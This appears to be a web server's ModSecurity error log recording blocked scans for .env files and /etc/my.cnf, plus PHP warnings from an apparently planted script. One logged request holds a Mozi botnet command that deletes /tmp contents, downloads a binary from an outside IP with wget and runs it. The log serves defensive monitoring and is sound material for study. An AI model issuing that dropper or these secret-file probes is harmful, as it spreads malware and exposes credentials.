[Tue May 12 01:16:54.324558 2026] [security2:error] [pid 1695975:tid 1695992] [client 34.107.89.183:54622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/api/.env"] [unique_id "agJjZtVI9ymHBxup749xIQAAAI4"]
[Tue May 12 01:16:54.326870 2026] [security2:error] [pid 1695975:tid 1695992] [client 34.107.89.183:54622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/api/.env"] [unique_id "agJjZtVI9ymHBxup749xIQAAAI4"]
[Tue May 12 01:16:54.339195 2026] [security2:error] [pid 1709071:tid 1709089] [client 34.107.89.183:54634] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env"] [unique_id "agJjZrvMumyrWMfSu7qOOAAAAMI"]
[Tue May 12 01:16:54.339396 2026] [security2:error] [pid 1709071:tid 1709089] [client 34.107.89.183:54634] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env"] [unique_id "agJjZrvMumyrWMfSu7qOOAAAAMI"]
[Tue May 12 01:16:54.339613 2026] [security2:error] [pid 1709071:tid 1709089] [client 34.107.89.183:54634] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env"] [unique_id "agJjZrvMumyrWMfSu7qOOAAAAMI"]
[Tue May 12 01:16:54.408504 2026] [security2:error] [pid 1630927:tid 1630950] [client 34.107.89.183:54638] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.dev"] [unique_id "agJjZmiGYYhUwDaJINnKUQAAAVQ"]
[Tue May 12 01:16:54.408753 2026] [security2:error] [pid 1630927:tid 1630950] [client 34.107.89.183:54638] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.dev"] [unique_id "agJjZmiGYYhUwDaJINnKUQAAAVQ"]
[Tue May 12 01:16:54.409714 2026] [security2:error] [pid 1630927:tid 1630950] [client 34.107.89.183:54638] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.dev"] [unique_id "agJjZmiGYYhUwDaJINnKUQAAAVQ"]
[Tue May 12 01:16:55.288466 2026] [security2:error] [pid 1695975:tid 1695979] [client 34.107.89.183:54656] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.docker"] [unique_id "agJjZ9VI9ymHBxup749xIgAAAIE"]
[Tue May 12 01:16:55.288715 2026] [security2:error] [pid 1695975:tid 1695979] [client 34.107.89.183:54656] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.docker"] [unique_id "agJjZ9VI9ymHBxup749xIgAAAIE"]
[Tue May 12 01:16:55.289167 2026] [security2:error] [pid 1695975:tid 1695979] [client 34.107.89.183:54656] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.docker"] [unique_id "agJjZ9VI9ymHBxup749xIgAAAIE"]
[Tue May 12 01:16:55.301653 2026] [security2:error] [pid 1709071:tid 1709108] [client 34.107.89.183:54652] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agJjZ7vMumyrWMfSu7qOOQAAANU"]
[Tue May 12 01:16:55.302091 2026] [security2:error] [pid 1709071:tid 1709108] [client 34.107.89.183:54652] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agJjZ7vMumyrWMfSu7qOOQAAANU"]
[Tue May 12 01:16:55.302665 2026] [security2:error] [pid 1709071:tid 1709108] [client 34.107.89.183:54652] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agJjZ7vMumyrWMfSu7qOOQAAANU"]
[Tue May 12 01:16:55.372212 2026] [security2:error] [pid 1630927:tid 1630941] [client 34.107.89.183:54662] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.development.local"] [unique_id "agJjZ2iGYYhUwDaJINnKUgAAAUs"]
[Tue May 12 01:16:55.372659 2026] [security2:error] [pid 1630927:tid 1630941] [client 34.107.89.183:54662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.development.local"] [unique_id "agJjZ2iGYYhUwDaJINnKUgAAAUs"]
[Tue May 12 01:16:55.373170 2026] [security2:error] [pid 1630927:tid 1630941] [client 34.107.89.183:54662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.development.local"] [unique_id "agJjZ2iGYYhUwDaJINnKUgAAAUs"]
[Tue May 12 01:16:56.329822 2026] [security2:error] [pid 1695975:tid 1695993] [client 34.107.89.183:54668] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.dev.local"] [unique_id "agJjaNVI9ymHBxup749xJAAAAI8"]
[Tue May 12 01:16:56.330083 2026] [security2:error] [pid 1695975:tid 1695993] [client 34.107.89.183:54668] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.dev.local"] [unique_id "agJjaNVI9ymHBxup749xJAAAAI8"]
[Tue May 12 01:16:56.330815 2026] [security2:error] [pid 1695975:tid 1695993] [client 34.107.89.183:54668] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.dev.local"] [unique_id "agJjaNVI9ymHBxup749xJAAAAI8"]
[Tue May 12 01:17:01.624555 2026] [core:error] [pid 1630927:tid 1630953] [client 167.94.146.59:28378] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:17:01.624962 2026] [core:error] [pid 1630927:tid 1630953] [client 167.94.146.59:28378] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:17:15.320067 2026] [security2:error] [pid 1707624:tid 1707685] [client 49.51.73.183:57578] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/securite/"] [unique_id "agJje7OxS7i6i_mT2NKtywAAAEM"]
PHP Warning:  filesize(): stat failed for /proc/73/task/73/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/73/task/73/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/73/task/73/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/73/task/73/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/73/task/73/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/73/task/73/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:18:31.704976 2026] [security2:error] [pid 1709071:tid 1709105] [client 216.73.216.110:62592] ModSecurity: Warning. Matched phrase "etc/my.cnf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/my.cnf found within ARGS:filesrc: /etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJjx7vMumyrWMfSu7qOwQAAANI"]
[Tue May 12 01:18:31.708707 2026] [security2:error] [pid 1709071:tid 1709105] [client 216.73.216.110:62592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJjx7vMumyrWMfSu7qOwQAAANI"]
[Tue May 12 01:18:31.792403 2026] [security2:error] [pid 1709071:tid 1709105] [client 216.73.216.110:62592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJjx7vMumyrWMfSu7qOwQAAANI"]
[Tue May 12 01:19:09.239730 2026] [security2:error] [pid 1630927:tid 1630950] [client 206.135.170.212:51536] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cpanel.totalcloud.fr"] [uri "/setup.cgi"] [unique_id "agJj7WiGYYhUwDaJINnLEQAAAVQ"]
[Tue May 12 01:19:09.241123 2026] [security2:error] [pid 1630927:tid 1630950] [client 206.135.170.212:51536] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'nc' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: nc found within ARGS:cmd: rm -rf /tmp/*;wget http://206.135.170.212:42563/Mozi.m -O /tmp/netgear;sh netgear"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "cpanel.totalcloud.fr"] [uri "/setup.cgi"] [unique_id "agJj7WiGYYhUwDaJINnLEQAAAVQ"]
[Tue May 12 01:19:09.241591 2026] [security2:error] [pid 1630927:tid 1630950] [client 206.135.170.212:51536] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "cpanel.totalcloud.fr"] [uri "/setup.cgi"] [unique_id "agJj7WiGYYhUwDaJINnLEQAAAVQ"]
[Tue May 12 01:19:09.248817 2026] [security2:error] [pid 1630927:tid 1630950] [client 206.135.170.212:51536] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "cpanel.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJj7WiGYYhUwDaJINnLEQAAAVQ"]
[Tue May 12 01:20:05.443374 2026] [security2:error] [pid 1709071:tid 1709099] [client 129.226.211.69:45178] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/hirondelle/"] [unique_id "agJkJbvMumyrWMfSu7qPiwAAAMw"]
[Tue May 12 01:20:20.805331 2026] [security2:error] [pid 1709071:tid 1709109] [client 43.130.72.40:42500] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/wp/v2/pages/1054"] [unique_id "agJkNLvMumyrWMfSu7qPlgAAANY"]
[Tue May 12 01:20:35.641835 2026] [ssl:error] [pid 1691274:tid 1691297] (EAI 2)Name or service not known: [client 74.7.241.129:36940] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 01:20:35.641887 2026] [ssl:error] [pid 1691274:tid 1691297] AH01941: stapling_renew_response: responder error
[Tue May 12 01:20:37.394373 2026] [security2:error] [pid 1707624:tid 1707684] [client 43.159.143.139:49388] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJkRbOxS7i6i_mT2NKvSQAAAEI"]
[Tue May 12 01:20:43.864934 2026] [security2:error] [pid 1630927:tid 1630938] [client 43.167.236.228:42024] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "moncampingcarenligne.com"] [uri "/"] [unique_id "agJkS2iGYYhUwDaJINnLwwAAAUg"]
[Tue May 12 01:20:56.885796 2026] [security2:error] [pid 1695975:tid 1695986] [client 43.130.31.17:58632] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJkWNVI9ymHBxup749zJgAAAIg"]
[Tue May 12 01:21:01.809686 2026] [security2:error] [pid 1707624:tid 1707682] [client 176.65.139.235:37972] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJkXbOxS7i6i_mT2NKvagAAAEA"]
[Tue May 12 01:21:01.809915 2026] [security2:error] [pid 1707624:tid 1707682] [client 176.65.139.235:37972] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJkXbOxS7i6i_mT2NKvagAAAEA"]
[Tue May 12 01:21:01.810155 2026] [security2:error] [pid 1707624:tid 1707682] [client 176.65.139.235:37972] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJkXbOxS7i6i_mT2NKvagAAAEA"]
